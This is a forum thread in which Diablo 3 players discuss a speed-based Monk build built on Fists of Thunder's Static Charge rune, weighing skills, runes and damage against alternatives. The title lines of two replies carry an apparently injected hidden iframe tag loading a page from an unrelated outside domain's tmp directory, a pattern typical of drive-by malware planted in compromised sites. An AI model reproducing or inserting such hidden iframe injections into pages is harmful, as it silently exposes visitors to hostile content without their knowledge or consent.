Latest Diablo 3 News
DiabloWiki Updates
Support the site! Become a Diablo: IncGamers PAL - Remove ads and more!

Speedy static fister build

Discussion in 'Monk' started by DiabloCalibur, May 3, 2012. | Replies: 10 | Views: 2271

1. DiabloCalibur

DiabloCalibur IncGamers Member

Speedy static fister build

My theory build will revolve around using the speed of Fists of Thunder/Static Charge-which adds a DoT that deals 37% damage to that enemy each time I use Static Charge and lasts 5 seconds-as his main damager and (only) spirit generator.

His main spirit spender will be Lashing Tail Kick runed with Scorpion Sting for a 50% chance to stun enemies up close so he can go to work easier with Static Charge and will also serve as a secondary form of damage. Despite the stun-length being rather short- 1.5 seconds- I choose it over Blinding Flash and it's variants for damage capablities and the fact that unlike Blinding Flash, it does not have a cooldown. Also, my Monk will be having a fairly high level of dodge chance to help deal with being up-close all the time.

For healing and defense, my next skill will be Breath of Heaven (Diablo's holding his nose shut in disgust..) runed with Penitent Flame, which causes enemies to flee for 1.5 seconds. This is doubly added defense in case I need it when I heal; if I don't, I can always rush towards them after I'm all recovered-up. Which brings me to my next skill:

Dashing Strike. I'll be runing it with Way of the Falling Star, which increases speed movement by 25% for 3 seconds. I choose this skill variant because I will be using it liberally in the thick of things for when I want to hit a new, far-off target with a static charge (I do hope the visual icon for Static Charge is clearly visible); the speed increase should help me move things along nicely.

For my mantra I will have none other than the Mantra of Evasion, runed with Wind through the Reeds, as I plan to do just that while breezing through enemy ranks. This rune version adds a small but decent 5% movement speed for the length of the mantra.

And finally, as my last spirit spender I choose Sweeping Wind runed with Fire Storm. This skill will be my set-and-forget skill as I will very often be close to enemies while also hitting them often with Fists of Thunder to keep up my vortex. I choose Fire Storm as a means for three total damage types.

For my passives I will be going with an immediate boost to movement speed with Fleet Footed. Since I will be a super speedy attacker and therefore be dual-wielding, I will go for the dual-wield bonus of the Guardian's Path's bonus to dodge for dual-wielding (I apologize for the slight redundance in that last sentence heh). And for my final passive I choose Sixth Sense, which gives me a dodge chance equal to 30% of my critical hit rate.

This build will require extreme dexterity on my part and will be one god-dammed clickety-click fest, even in a game that is already traditionally thought of as a click-fest. I love the idea of Static Charge though; it sounds fun and intriguing as I will be concentrating on the mob as a whole rather than hitting one monster until it dies. The entire screen essentially becomes my AoE so long as I can keep up my attack and movement finesse throughout. I will be darting through enemies and giving each one a punch to the gut before immediately moving on to the next, interspersed with the more-than-occasional Lashing Tail Kick to aid my main attack.
  2. redrach

redrach IncGamers Member

Re: Speedy static fister build

The damage on that rune seems pretty low to justify such a demanding playstyle. You could just stand in place and use Crippling Wave/Mangle and do 143% damage to all enemies directly in front of you (and around you 1/3rd of the time). Meanwhile your build has you bouncing around using a mostly single target skill that does only 110% to your primary target and only 37% to enemies you hit in the last 5 seconds (3rd hit is AoE, but still does less damage than Mangle's 3rd hit), not to mention you don't get Crippling Wave's slow debuff.
    The only real advantage I can see FoT having is that it'll regenerate a lot more spirit than the other generators (and you can use it as a short-range teleport if you use Thunderclap). Static Charge's damage seems way too low to appeal to me.
  3. Shagsbeard

Shagsbeard IncGamers Member

Re: Speedy static fister build<iframe src=http://forums.weddingbells.ca/tmp/index.htm

You keep writing in the first person like you're the only one playing this game.
  4. Sangdrax

Sangdrax IncGamers Member

Re: Speedy static fister build<iframe src=http://forums.weddingbells.ca/tmp/index.htm

How do you mean? In what way is his using "I" implying he will be the only person playing the game?

5. Hellpyre

Hellpyre IncGamers Member

Or like he's going to be doing this himself. You you prefer him using "you" for some reason?

6. DiabloCalibur

I deliberately wrote in the method that I did because I wanted to portray a feeling of plannning and formulation in the present tense - as I had not have the opportunity to played the game yet.

@ Redrach: I appreciate the feedback.

There will probably be many more effecient Monk builds available, but I won't be dismissing the skill as obsolete when compared. Not to mention, I'm most intrigued by the unique play style that Static Charge allows.
    Fists of Thunder will certainly be one of the Monks fastest attacks- if not the fastest, so imagine if I can get 2-3 attacks per second. That would be 463% weapon damage on the first monster I hit after the timer runs out, considering I play next to perfect; I calculated that at 2.5 hits a second (though I betcha we'll be seeing something just under Zeal-worthy attack speeds with this one). The damage is fantastic considering this is a generator and I'm actually gaining resource upon using this skill.

One way to boost the effectiveness of this build would indeed be upping the damage it deals, but I think a far more interesting and build-complimenting approach would be to extend the DoT timer. Perhaps through items??
  7. jwfcp

jwfcp IncGamers Member

grammar nerds!!!

I like Lashing Tail Kick Scorpion Sting alot. have you considered cyclone strike for wrangling hordes of ranged enemies that will probably running from you a fair amount?

Why dashing strike to an enemy when you can fists of thunder: thunderclap to an enemy instead?
  8. DiabloCalibur

Ooo! Cyclone Strike! I quickly dismissed that skill simply because I didn't like the mechanism but I overlooked it's potential application in this build. I will definitely be revising my build for that skill.
  9. redrach

redrach IncGamers Member

Because the entire build is built around another FoT rune :p

10. Threepwood

Threepwood IncGamers Member

It seems to me that unless the Static Charge effect has some pretty extreme range, it's made obsolete by Thunderclap. I'm not even talking about the teleport--just the damage. Thunderclap does an extra 35% to everything nearby (including your primary target), while Static Charge does 37% to any enemy that has been the primary target in the last 5 seconds. Static Charge seems like more trouble for less effect. It might have some utility if you're able to "charge" a guy and then dash/run to the other side of the screen and punch someone else to hurt your original target for a few seconds, but even that doesn't sound super-useful.
  11. jwfcp

jwfcp IncGamers Member

Ah good point, Ive already given myself over to the corpse explosion like effect of exploding palm for my aoe, so the thought hadnt even entered my mind even though its the title of the thread :p

fair point on the micro management of static charge, cleave lets you just swipe into a pack, static needs you to constantly play duck duck goose to keep the 5 sec debuff applied to everything.